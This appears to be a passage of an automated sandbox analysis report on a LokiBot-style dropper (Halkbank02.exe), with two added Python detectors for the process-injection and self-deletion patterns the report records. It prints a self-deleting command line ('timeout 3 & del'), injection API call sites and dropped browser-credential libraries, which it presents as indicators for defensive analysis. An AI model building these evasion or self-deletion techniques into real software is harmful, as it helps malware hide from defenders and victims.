Source: 00000001.00000002.559362429.0000000000410000.00000020.00020000.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000000.235153506.0000000000410000.00000020.00020000.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001C.00000000.557106702.0000000000410000.00000020.00020000.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_00401500
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_00402872
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_00402C7A
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_00402A0C
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_00402C3F
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_004028F7
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_00402A81
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_004020A7
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_00401550
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_00402B02
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_004027DC
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_00402B84
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_0040298D
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A0E15
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022AA2B9
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A08DF
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A614D
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A65A4
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A11E1
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A122A
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A022B
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A2024
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A4E25
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A060B
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022AA00E
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A146E
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A3673
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A0A46
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A1C46
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A8452
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A2850
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A18AE
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A4AA3
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A9AA0
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A38A1
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A46B6
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A248A
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A8E8E
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A628F
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A3093
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A7294
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A98EA
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A28EB
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A8EE0
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A90F3
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A22F6
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A52C8
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022AA8D9
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A50D3
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022AACD7
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A352D
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A6F22
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A630A
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A9B0D
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A2F1D
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A8D6F
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A5963
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A1B72
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A9149
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A1340
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A9745
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A8F56
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A4983
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A6781
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A1592
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A85E3
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A4DF9
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A41F0
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022AA7C9
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A99C2
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A9DC3
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A9DC1
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A05DF
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A69DD
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A37D2
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A4DD3
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A89D6
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A0E15 NtWriteVirtualMemory, LoadLibraryA
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022AA2B9 NtWriteVirtualMemory, K32GetDeviceDriverBaseNameA
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A65A4 NtWriteVirtualMemory, NtAllocateVirtualMemory
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A11E1 NtWriteVirtualMemory, TerminateProcess, LoadLibraryA
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022AA1D8 NtProtectVirtualMemory
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A2024 NtWriteVirtualMemory
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022AA254 NtProtectVirtualMemory
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A52C8 NtWriteVirtualMemory
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A50D3 NtWriteVirtualMemory
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022AACD7 NtWriteVirtualMemory
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A352D NtWriteVirtualMemory, LoadLibraryA
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A8D6F NtWriteVirtualMemory
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A5963 NtWriteVirtualMemory
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A6781 NtWriteVirtualMemory, LoadLibraryA
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A85E3 NtWriteVirtualMemory
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A4DF9 NtWriteVirtualMemory
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A41F0 NtWriteVirtualMemory
      Source: C:\Users\user\Desktop\Halkbank02.exe | Code function: 1_2_022A4DD3 NtWriteVirtualMemory
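The native-API call sites listed above (NtAllocateVirtualMemory at 1_2_022A65A4, the many NtWriteVirtualMemory callers, and NtProtectVirtualMemory at 1_2_022AA1D8 and 1_2_022AA254) are the three steps of in-memory unpacking and process injection: allocate writable memory, write a payload into it, then change its protection to executable. The report shows the call sites, not their order or targets. The following is an added example, not part of this report or of any sandbox tooling: a stateful tracker over an API trace that alerts when a region is written and then made executable, or written while already executable. The trace, process id, addresses, sizes and caller labels are constructed for illustration.

```python
# Added example: stateful detection of the allocate -> write -> make-executable pattern
# over an API trace. The trace below is CONSTRUCTED for illustration; it is not the
# sandbox's raw log, and the pid, addresses, sizes and caller labels are invented.

PAGE_READWRITE = 0x04
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
# Every PAGE_EXECUTE* protection constant has one of these bits set.
EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80

# (caller, api, target_pid, address, size, protect); protect is None for writes
SAMPLE_TRACE = [
    ("fn_a", "NtAllocateVirtualMemory", 4242, 0x00400000, 0x8000, PAGE_READWRITE),
    ("fn_b", "NtWriteVirtualMemory",    4242, 0x00400000, 0x1000, None),
    ("fn_b", "NtWriteVirtualMemory",    4242, 0x00401000, 0x2000, None),
    ("fn_c", "NtProtectVirtualMemory",  4242, 0x00400000, 0x8000, PAGE_EXECUTE_READ),
    # Ordinary heap-like use: stays writable, never executable -> no alert.
    ("fn_a", "NtAllocateVirtualMemory", 4242, 0x00500000, 0x1000, PAGE_READWRITE),
    ("fn_b", "NtWriteVirtualMemory",    4242, 0x00500000, 0x0200, None),
    # RWX from the start, then written -> alert on the write itself.
    ("fn_a", "NtAllocateVirtualMemory", 4242, 0x00600000, 0x2000, PAGE_EXECUTE_READWRITE),
    ("fn_b", "NtWriteVirtualMemory",    4242, 0x00600000, 0x0800, None),
]


class InjectionTracker:
    """Tracks regions per target process and flags write-then-execute transitions."""

    def __init__(self):
        self.regions = {}   # (pid, base) -> {"size", "protect", "written"}
        self.alerts = []

    def _region_for(self, pid, addr):
        for (rpid, base), region in self.regions.items():
            if rpid == pid and base <= addr < base + region["size"]:
                return base, region
        return None, None

    def feed(self, caller, api, pid, addr, size, protect):
        if api == "NtAllocateVirtualMemory":
            self.regions[(pid, addr)] = {"size": size, "protect": protect, "written": 0}
            return
        base, region = self._region_for(pid, addr)
        if region is None:
            return  # write/protect into memory we never saw allocated; out of scope here
        if api == "NtWriteVirtualMemory":
            region["written"] += size
            if region["protect"] & EXEC_MASK:
                self.alerts.append(
                    f"{caller}: pid {pid} wrote {size:#x} bytes into executable region {base:08X}")
        elif api == "NtProtectVirtualMemory":
            if protect & EXEC_MASK and region["written"]:
                self.alerts.append(
                    f"{caller}: pid {pid} region {base:08X} made executable after "
                    f"{region['written']:#x} bytes were written")
            region["protect"] = protect


def detect_injection(trace):
    """Replay a trace of (caller, api, pid, addr, size, protect) records; return alerts."""
    tracker = InjectionTracker()
    for record in trace:
        tracker.feed(*record)
    return tracker.alerts


if __name__ == "__main__":
    for alert in detect_injection(SAMPLE_TRACE):
        print(alert)
```

The tracker keys on the allocation, not on any single call, so a write into an RW region that is never made executable stays silent while the RW-write-RX and RWX-write sequences both alert; on a real trace the same logic would be keyed on the target process handle and fed from an API monitor or ETW.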
      Source: C:\Users\user\Desktop\Halkbank02.exe | Process Stats: CPU usage > 98%
      Source: api-ms-win-core-util-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-crt-private-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-core-file-l2-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-crt-heap-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-core-localization-l1-2-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-core-console-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-crt-math-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-crt-filesystem-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-crt-multibyte-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-core-processthreads-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-crt-time-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-core-debug-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-crt-environment-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-crt-locale-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-crt-convert-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-core-rtlsupport-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-crt-conio-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-core-file-l1-2-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-core-libraryloader-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-core-file-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-core-processthreads-l1-1-1.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-core-errorhandling-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-core-profile-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-core-processenvironment-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-core-handle-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-crt-utility-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-core-string-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-crt-string-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-core-datetime-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-core-timezone-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-core-heap-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-crt-stdio-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-core-memory-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-core-sysinfo-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-core-synch-l1-2-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-core-interlocked-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-core-namedpipe-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-core-synch-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-crt-process-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: api-ms-win-crt-runtime-l1-1-0.dll.28.dr | Static PE information: No import functions for PE file found
      Source: Halkbank02.exe, 00000001.00000000.235179747.0000000000418000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamemeduse.exe vs Halkbank02.exe
      Source: Halkbank02.exe, 00000001.00000002.562536410.0000000002180000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamemeduse.exeFE2XGeneral court% vs Halkbank02.exe
      Source: Halkbank02.exe | Binary or memory string: OriginalFilename vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000003.872117132.000000001EFC4000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameapisetstubj% vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000003.881018739.000000001F820000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamevcruntime140.dll^ vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamenss3.dll0 vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamenssdbm3.dll0 vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamesoftokn3.dll0 vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameucrtbase.dllj% vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamefreebl3.dll0 vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamemozglue.dll0 vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000003.876940692.000000001F530000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamemsvcp140.dll^ vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000000.557120833.0000000000418000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamemeduse.exe vs Halkbank02.exe
      Source: Halkbank02.exe | Binary or memory string: OriginalFilenamemeduse.exe vs Halkbank02.exe
      Source: Halkbank02.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Users\user\Desktop\Halkbank02.exe | Section loaded: crtdll.dll
      Source: Halkbank02.exe | ReversingLabs: Detection: 13%
      Source: Halkbank02.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Halkbank02.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\Halkbank02.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: unknown | Process created: C:\Users\user\Desktop\Halkbank02.exe 'C:\Users\user\Desktop\Halkbank02.exe'
      Source: C:\Users\user\Desktop\Halkbank02.exe | Process created: C:\Users\user\Desktop\Halkbank02.exe 'C:\Users\user\Desktop\Halkbank02.exe'
      Source: C:\Users\user\Desktop\Halkbank02.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'Halkbank02.exe'
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
      Source: C:\Users\user\Desktop\Halkbank02.exe | Process created: C:\Users\user\Desktop\Halkbank02.exe 'C:\Users\user\Desktop\Halkbank02.exe'
      Source: C:\Users\user\Desktop\Halkbank02.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'Halkbank02.exe'
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
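The process chain above is the self-deletion behaviour flagged in the signature list: the sample spawns cmd.exe with '/c timeout 3 & del Halkbank02.exe', and the delay lets the parent exit before the delete runs so the file is no longer locked. The following is an added example, not part of the report: detection logic over process-creation events (Sysmon Event ID 1-style field names are assumed) that flags a cmd.exe child whose command line chains a delay (timeout or ping) into a del/erase whose target carries the parent's own image name. The events, including the benign ones, are constructed for illustration.

```python
import ntpath
import re

# Added example. CONSTRUCTED process-creation events with Sysmon Event ID 1-style field
# names (ParentImage, Image, CommandLine); not taken from the sandbox's raw log.
SAMPLE_EVENTS = [
    {   # the pattern from the report: delay, then delete the parent's image by bare name
        "ParentImage": r"C:\Users\user\Desktop\Halkbank02.exe",
        "Image": r"C:\Windows\SysWOW64\cmd.exe",
        "CommandLine": r"'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'Halkbank02.exe'",
    },
    {   # delete without a delay and unrelated to the parent -> benign
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'"C:\Windows\System32\cmd.exe" /c del C:\Temp\build.log',
    },
    {   # same trick with ping as the delay and a full path as the target
        "ParentImage": r"C:\Tools\installer.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 4 > nul & del "C:\Tools\installer.exe"',
    },
    {   # the timeout.exe grandchild is not what the rule keys on
        "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
        "Image": r"C:\Windows\SysWOW64\timeout.exe",
        "CommandLine": r"C:\Windows\system32\timeout.exe 3",
    },
]

# A delay primitive anywhere in the command line ...
DELAY_RE = re.compile(r"\b(?:timeout|ping)(?:\.exe)?\b", re.IGNORECASE)
# ... plus del/erase and its first argument (up to the next & or | or the end of the line).
DELETE_RE = re.compile(r"\b(?:del|erase)\b\s+(.+?)\s*(?:[&|]|$)", re.IGNORECASE)


def deleted_target(cmdline):
    """Return the file argument of the first del/erase in cmdline, unquoted, or None."""
    m = DELETE_RE.search(cmdline)
    return m.group(1).strip("'\"") if m else None


def is_self_delete(event):
    """True when a cmd.exe child delays, then deletes a file named like its parent's image."""
    if ntpath.basename(event["Image"]).lower() != "cmd.exe":
        return False
    cmdline = event["CommandLine"]
    if not DELAY_RE.search(cmdline):
        return False
    target = deleted_target(cmdline)
    if target is None:
        return False
    # The dropper deletes by bare filename (its cwd is its own directory) or by full path;
    # compare basenames so both forms match.
    parent_name = ntpath.basename(event["ParentImage"]).lower()
    return ntpath.basename(target).lower() == parent_name


def find_self_deletions(events):
    """Return the command lines of all events matching the self-deletion pattern."""
    return [e["CommandLine"] for e in events if is_self_delete(e)]


if __name__ == "__main__":
    for cmdline in find_self_deletions(SAMPLE_EVENTS):
        print("self-delete:", cmdline)
```

Keying on the parent/target name match, rather than on 'timeout & del' alone, is what keeps installers and build scripts that clean up unrelated files out of the alert stream; the cost is that a dropper deleting a renamed copy of itself would need the target compared against the parent's original file name as well.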
      Source: C:\Users\user\Desktop\Halkbank02.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
      Source: C:\Users\user\Desktop\Halkbank02.exe | File created: C:\Users\user\AppData\Local\Temp\2fda\
      Source: classification engine | Classification label: mal100.rans.phis.troj.spyw.evad.winEXE@8/53@2/3
      Source: C:\Users\user\Desktop\Halkbank02.exe | File read: C:\Users\user\Desktop\desktop.ini
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr | Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr | Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr | Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr | Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr | Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr | Binary or memory string: SELECT ALL id FROM %s WHERE %s;
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr | Binary or memory string: SELECT ALL id FROM %s;
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr | Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr | Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.dr | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.dr | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.dr | Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.dr | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr | Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
